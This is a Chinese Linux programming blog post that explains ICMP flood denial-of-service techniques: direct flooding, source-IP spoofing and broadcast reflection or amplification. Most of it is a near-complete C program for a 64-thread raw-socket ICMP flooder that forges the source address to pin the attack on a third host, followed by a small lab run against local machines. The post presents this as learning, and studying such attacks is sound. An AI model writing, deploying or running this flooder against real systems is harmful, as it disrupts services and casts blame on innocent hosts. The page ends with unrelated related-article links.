我的上一篇文章《Linux编程之PING的实现》里使用ICMP协议实现了PING的程序，ICMP除了实现这么一个PING程序，还有哪些不为人知或者好玩的用途？这里我将介绍ICMP另一个很有名的黑科技：ICMP洪水攻击。 

ICMP洪水攻击属于大名鼎鼎的DOS（Denial of Service）攻击的一种，一种是黑客们喜欢的攻击手段，这里本着加深自己对ICMP的理解的目的，也试着基于ICMP写一段ICMP的洪水攻击小程序。 

洪水攻击（FLOOD ATTACK）指的是利用计算机网络技术向目的主机发送大量无用数据报文，使得目的主机忙于处理无用的数据报文而无法提供正常服务的网络行为。

ICMP洪水攻击：顾名思义，就是对目的主机发送洪水般的ping包，使得目的主机忙于处理ping包而无能力处理其他正常请求，这就好像是洪水一般的ping包把目的主机给淹没了。 

要实现ICMP的洪水攻击，需要以下三项的知识储备：

• DOS攻击原理
• ICMP的深入理解
• 原始套接字的编程技巧

一、ICMP洪水攻击原理

ICMP洪水攻击是在ping的基础上形成的，但是ping程序很少能造成目的及宕机的问题，这是因为ping的发送包的速率太慢了，像我实现的PING程序里ping包发送速率限定在1秒1发，这个速率目的主机处理ping包还是绰绰有余的。所以要造成“洪水”的现象，就必须提升发包速率。这里介绍三种ICMP洪水攻击的方式： 

（1）直接洪水攻击

这样做需要本地主机的带宽和目的主机的带宽之间进行比拼，比如我的主机网络带宽是30M的，而你的主机网络带宽仅为3M，那我发起洪水攻击淹没你的主机成功率就很大了。这种攻击方式要求攻击主机处理能力和带宽要大于被攻击主机，否则自身被DoS了。基于这种思想，我们可以使用一台高带宽高性能的电脑，采用多线程的方法一次性发送多个ICMP请求报文，让目的主机忙于处理大量这些报文而造成速度缓慢甚至宕机。这个方法有个大缺点，就是对方可以根据ICMP包的IP地址而屏蔽掉攻击源，使得攻击不能继续。 

（2）伪IP攻击

在直接洪水攻击的基础上，我们将发送方的IP地址伪装成其他IP，如果是伪装成一个随机的IP，那就可以很好地隐藏自己的位置；如果将自己的IP伪装成其他受害者的IP，就会造成“挑拨离间”的情形，受害主机1的icmp回复包也如洪水般发送给受害主机2，如果主机1的管理员要查是哪个混蛋发包攻击自己，他一查ICMP包的源地址，咦原来是主机2，这样子主机2就成了戴罪羔羊了。 

（3）反射攻击

这类攻击的思想不同于上面两种攻击，反射攻击的设计更为巧妙。其实这里的方式三的攻击模式是前两个模式的合并版以及升级版，方式三的攻击策略有点像“借刀*“，反射攻击不再直接对目标主机，而是让其他一群主机误以为目标主机在向他们发送ICMP请求包，然后一群主机向目的主机发送ICMP应答包，造成来自四面八方的洪水淹没目的主机的现象。比如我们向局域网的其他主机发送ICMP请求包，然后自己的IP地址伪装成目的主机的IP，这样子目的主机就成了ICMP回显的焦点了。这种攻击非常隐蔽，因为受害主机很难查出攻击源是谁。 

二、ICMP洪水攻击程序设计

这里我想实现一个ICMP洪水攻击的例子，这里我想采用方式二来进行设计。虽说方式三的“借刀*”更为巧妙，其实也是由方式二的伪装方式进一步延伸的，实现起来也是大同小异。 

首先给出攻击的模型图：

1.组ICMP包

这里的组包跟编写PING程序时的组包没太大差别，唯一需要注意的是，我们需要填写IP头部分，因为我们要伪装源地址，做到嫁祸于人。

void DoS_icmp_pack(char* packet)
{
  struct ip* ip_hdr = (struct ip*)packet;
  struct icmp* icmp_hdr = (struct icmp*)(packet + sizeof(struct ip));

  ip_hdr->ip_v = 4;
  ip_hdr->ip_hl = 5;
  ip_hdr->ip_tos = 0;
  ip_hdr->ip_len = htons(ICMP_PACKET_SIZE);
  ip_hdr->ip_id = htons(getpid());
  ip_hdr->ip_off = 0;
  ip_hdr->ip_ttl = 64;
  ip_hdr->ip_p = PROTO_ICMP;
  ip_hdr->ip_sum = 0;
  ip_hdr->ip_src.s_addr = inet_addr(FAKE_IP);; //伪装源地址
  ip_hdr->ip_dst.s_addr = dest; //填入要攻击的目的主机地址

  icmp_hdr->icmp_type = ICMP_ECHO;
  icmp_hdr->icmp_code = 0;
  icmp_hdr->icmp_cksum = htons(~(ICMP_ECHO << 8));
  //注意这里，因为数据部分为0，我们就简化了一下checksum的计算了
}

2.搭建发包线程

void Dos_Attack()
{
  char* packet = (char*)malloc(ICMP_PACKET_SIZE);
  memset(packet, 0, ICMP_PACKET_SIZE);
  struct sockaddr_in to;
  DoS_icmp_pack(packet);

  to.sin_family = AF_INET;
  to.sin_addr.s_addr = dest;
  to.sin_port = htons(0);

  while(alive) //控制发包的全局变量
  {
    sendto(rawsock, packet, ICMP_PACKET_SIZE, 0, (struct sockaddr*)&to, sizeof(struct sockaddr));    
  }

  free(packet); //记得要释放内存
}

3.编写发包开关

这里的开关很简单，用信号量+全局变量即可以实现。当我们按下ctrl+c时，攻击将关闭。

void Dos_Sig()
{
  alive = 0;
  printf("stop DoS Attack!\n");
}

 4.总的架构

我们使用了64个线程一起发包，当然这个线程数还可以大大增加，来增加攻击强度。但我们只是做做实验，没必要搞那么大。

int main(int argc, char* argv[])
{
  struct hostent* host = NULL;
  struct protoent* protocol = NULL;
  int i;
  alive = 1;
  pthread_t attack_thread[THREAD_MAX_NUM]; //开64个线程同时发包  
  int err = 0;

  if(argc < 2)
  {
    printf("Invalid input!\n");
    return -1;
  }

  signal(SIGINT, Dos_Sig);

  protocol = getprotobyname(PROTO_NAME);
  if(protocol == NULL)
  {
    printf("Fail to getprotobyname!\n");
    return -1;
  }

  PROTO_ICMP = protocol->p_proto;

  dest = inet_addr(argv[1]);

  if(dest == INADDR_NONE)
  {
    host = gethostbyname(argv[1]);
    if(host == NULL)
    {
      printf("Invalid IP or Domain name!\n");
      return -1;
    }
    memcpy((char*)&dest, host->h_addr, host->h_length);

  }

  rawsock = socket(AF_INET, SOCK_RAW, PROTO_ICMP);
  if(rawsock < 0)
  {
    printf("Fait to create socket!\n");
    return -1;
  }

  setsockopt(rawsock, SOL_IP, IP_HDRINCL, "1", sizeof("1"));

  printf("ICMP FLOOD ATTACK START\n");

  for(i=0;i<THREAD_MAX_NUM;i++)
  {
    err = pthread_create(&(attack_thread[i]), NULL, (void*)Dos_Attack, NULL);
    if(err)
    {
      printf("Fail to create thread, err %d, thread id : %d\n",err, attack_thread[i]);      
    }
  }

  for(i=0;i<THREAD_MAX_NUM;i++)
  {
    pthread_join(attack_thread[i], NULL);  //等待线程结束
  }

  printf("ICMP ATTACK FINISHI!\n");

  close(rawsock);

  return 0;
}

三、实验

本次实验本着学习的目的，想利用自己手上的设备，想进一步理解网络和协议的应用，所以攻击的幅度比较小，时间也就几秒，不对任何设备造成影响。 

再说一下我们的攻击步骤：我们使用主机172.0.5.183作为自己的攻击主机，并将自己伪装成主机172.0.5.182，对主机172.0.5.9发起ICMP洪水攻击。

攻击开始

我们观察一下”受害者“那边的情况。在短短5秒里，正确收到并交付上层处理的包也高达7万多个了。我也不敢多搞事，避免影响机器工作。

使用wireshark抓包再瞧一瞧，满满的ICMP包啊，看来量也是很大的。ICMP包的源地址显示为172.0.5.182（我们伪装的地址），它也把echo reply回给了172.0.5.182。主机172.0.5.182肯定会想，莫名其妙啊，怎么收到这么多echo reply包。

攻击实验做完了。  

现在更为流行的是DDOS攻击，其威力更为强悍，策略更为精巧，防御难度也更加高。
其实，这种DDoS攻击也是在DOS的基础上发起的，具体步骤如下： 

    1. 攻击者向“放大网络”广播echo request报文
    2. 攻击者指定广播报文的源IP为被攻击主机
    3. “放大网络”回复echo reply给被攻击主机
    4. 形成DDoS攻击场景 

这里的“放大网络”可以理解为具有很多主机的网络，这些主机的操作系统需要支持对目的地址为广播地址的某种ICMP请求数据包进行响应。 

攻击策略很精妙，简而言之，就是将源地址伪装成攻击主机的IP，然后发广播的给所有主机，主机们收到该echo request后集体向攻击主机回包，造成群起而攻之的情景。

以上就是本文的全部内容，希望对大家的学习有所帮助，也希望大家多多支持。

# Linux  # ICMP  # 洪水攻击  # Linux C中多线程与volatile变量  # 详谈Linux写时拷贝技术(copy-on-write)必看篇  # 详解Linux系统中网卡MAC地址克隆方法  # Oracle Linux 6.8安装 mysql 5.7.17的详细教程  # NetCore1.1+Linux部署初体验  # Linux系统中利用node.js提取Word(doc/docx)及PDF文本的内容  # linux下tomcat常用操作  # Linux C中sockaddr和sockaddr_in的区别  # 自己的  # 伪装成  # 基础上  # 源地址  # 的是  # 我想  # 是在  # 多个  # 这样子  # 网络带宽  # 嫁祸于人  # 信号量  # 全局变量  # 我也  # 就会  # 群起而攻之  # 很好  # 挑拨离间  # 就成了  # 有个 

相关栏目： 【 网站优化151355 】 【 网络推广146373 】 【 网络技术251813 】 【 AI营销90571 】

相关推荐： 标题：Vue + Vuex 项目中正确使用 JWT 进行身份认证的实践指南  如何在香港服务器上快速搭建免备案网站？  DeepSeek是免费使用的吗 DeepSeek收费模式与Pro版本功能详解  如何挑选高效建站主机与优质域名？  如何在新浪SAE免费搭建个人博客？  如何快速搭建高效简练网站？  如何快速搭建高效服务器建站系统？  武汉网站设计制作公司,武汉有哪些比较大的同城网站或论坛，就是里面都是武汉人的？  如何在橙子建站上传落地页？操作指南详解  简历在线制作网站免费版,如何创建个人简历？  Laravel Eloquent性能优化技巧_Laravel N+1查询问题解决  香港服务器网站测试全流程：性能评估、SEO加载与移动适配优化  如何利用DOS批处理实现定时关机操作详解  Laravel怎么做数据加密_Laravel内置Crypt门面的加密与解密功能  西安专业网站制作公司有哪些,陕西省建行官方网站？  Laravel如何设置自定义的日志文件名_Laravel根据日期或用户ID生成动态日志【技巧】  nginx修改上传文件大小限制的方法  车管所网站制作流程,交警当场开简易程序处罚决定书，在交警网站查询不到怎么办？  js实现点击每个li节点，都弹出其文本值及修改  Python数据仓库与ETL构建实战_Airflow调度流程详解  手机软键盘弹出时影响布局的解决方法  猎豹浏览器开发者工具怎么打开 猎豹浏览器F12调试工具使用【前端必备】  如何在万网自助建站中设置域名及备案？  西安市网站制作公司,哪个相亲网站比较好?西安比较好的相亲网站？  如何用JavaScript实现文本编辑器_光标和选区怎么处理  怎么制作网站设计模板图片,有电商商品详情页面的免费模板素材网站推荐吗？  javascript中数组（Array)对象和字符串（String)对象的常用方法总结  品牌网站制作公司有哪些,买正品品牌一般去哪个网站买？  如何破解联通资金短缺导致的基站建设难题？  LinuxCD持续部署教程_自动发布与回滚机制  Laravel数据库迁移怎么用_Laravel Migration管理数据库结构的正确姿势  Laravel中DTO是什么概念_在Laravel项目中使用数据传输对象(DTO)  laravel怎么在请求结束后执行任务（Terminable Middleware）_laravel Terminable Middleware请求结束任务执行方法  详解一款开源免费的.NET文档操作组件DocX（.NET组件介绍之一）  零服务器AI建站解决方案：快速部署与云端平台低成本实践  如何批量查询域名的建站时间记录？  家族网站制作贴纸教程视频,用豆子做粘帖画怎么制作？  C语言设计一个闪闪的圣诞树  bing浏览器学术搜索入口_bing学术文献检索地址  谷歌浏览器如何更改浏览器主题 Google Chrome主题设置教程  如何快速搭建安全的FTP站点？  如何登录建站主机？访问步骤全解析  PHP 实现电台节目表的智能时间匹配与今日/明日轮播逻辑  东莞市网站制作公司有哪些,东莞找工作用什么网站好？  Laravel策略(Policy)如何控制权限_Laravel Gates与Policies实现用户授权  Android中Textview和图片同行显示(文字超出用省略号，图片自动靠右边)  Laravel如何与Vue.js集成_Laravel + Vue前后端分离项目搭建指南  JavaScript如何实现错误处理_try...catch如何捕获异常？  如何在橙子建站中快速调整背景颜色？  标准网站视频模板制作软件,现在有哪个网站的视频编辑素材最齐全的，背景音乐、音效等？